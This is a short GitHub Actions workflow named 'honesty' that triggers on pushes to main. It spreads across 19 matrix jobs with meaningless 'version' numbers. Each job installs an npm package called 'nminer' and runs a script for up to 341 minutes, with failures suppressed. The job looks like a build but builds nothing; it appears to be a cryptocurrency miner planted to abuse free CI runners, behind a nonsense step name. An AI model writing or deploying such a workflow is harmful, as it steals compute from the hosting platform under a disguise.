name: honesty
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2670 }
          - { version: 2621 }
          - { version: 6408 }
          - { version: 775 }
          - { version: 2598 }
          - { version: 599 }
          - { version: 2433 }
          - { version: 4051 }
          - { version: 7971 }
          - { version: 5989 }
          - { version: 9295 }
          - { version: 766 }
          - { version: 194 }
          - { version: 3662 }
          - { version: 343 }
          - { version: 2533 }
          - { version: 4827 }
          - { version: 7662 }
          - { version: 2633 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: ill yawningly breed
        run: |
          npm install nminer@latest
          timeout 341m node honesty.js || echo "honesty executed"